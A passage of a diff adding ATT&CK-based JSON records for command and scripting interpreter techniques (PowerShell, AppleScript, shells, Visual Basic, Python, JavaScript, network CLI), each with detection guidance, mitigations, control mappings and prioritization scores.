+                "detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
+                "mitigations": [
+                    {
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.002",
+                "name": "Command and Scripting Interpreter: AppleScript",
+                "url": "https://attack.mitre.org/techniques/T1059/002",
+                "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)",
+                "detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+                "mitigations": [
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.003",
+                "name": "Command and Scripting Interpreter: Windows Command Shell",
+                "url": "https://attack.mitre.org/techniques/T1059/003",
+                "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",
+                "detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.004",
+                "name": "Command and Scripting Interpreter: Unix Shell",
+                "url": "https://attack.mitre.org/techniques/T1059/004",
+                "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
+                "detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.005",
+                "name": "Command and Scripting Interpreter: Visual Basic",
+                "url": "https://attack.mitre.org/techniques/T1059/005",
+                "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
+                "detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
+                "mitigations": [
+                    {
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
+                    },
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.006",
+                "name": "Command and Scripting Interpreter: Python",
+                "url": "https://attack.mitre.org/techniques/T1059/006",
+                "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
+                "detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+                "mitigations": [
+                    {
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
+                    },
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1033",
+                        "name": "Limit Software Installation",
+                        "description": "Block users or groups from installing unapproved software.",
+                        "url": "https://attack.mitre.org/mitigations/M1033"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.007",
+                "name": "Command and Scripting Interpreter: JavaScript",
+                "url": "https://attack.mitre.org/techniques/T1059/007",
+                "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
+                "detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            },
+            {
+                "tid": "T1059.008",
+                "name": "Command and Scripting Interpreter: Network Device CLI",
+                "url": "https://attack.mitre.org/techniques/T1059/008",
+                "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)",
+                "detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 2.914285714285714,
+        "adjusted_score": 2.914285714285714,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "9.3",
+            "9.6",
+            "9.7",
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-8",
+            "IA-9",
+            "RA-5",
+            "SC-18",
+            "SI-10",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.9142857142857143,
+            "mitigation_score": 0.8363636363636363,
+            "detection_score": 1
+        },
+        "choke_point_score": 1,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1059.001",
+        "name": "Command and Scripting Interpreter: PowerShell",
+        "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
+        "url": "https://attack.mitre.org/techniques/T1059/001",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.9476190476190476,
+        "adjusted_score": 0.9476190476190476,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "9.7",
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "IA-8",
+            "IA-9",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.002",
+        "name": "Command and Scripting Interpreter: AppleScript",
+        "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)",
+        "url": "https://attack.mitre.org/techniques/T1059/002",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.7",
+            "4.1"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.003",
+        "name": "Command and Scripting Interpreter: Windows Command Shell",
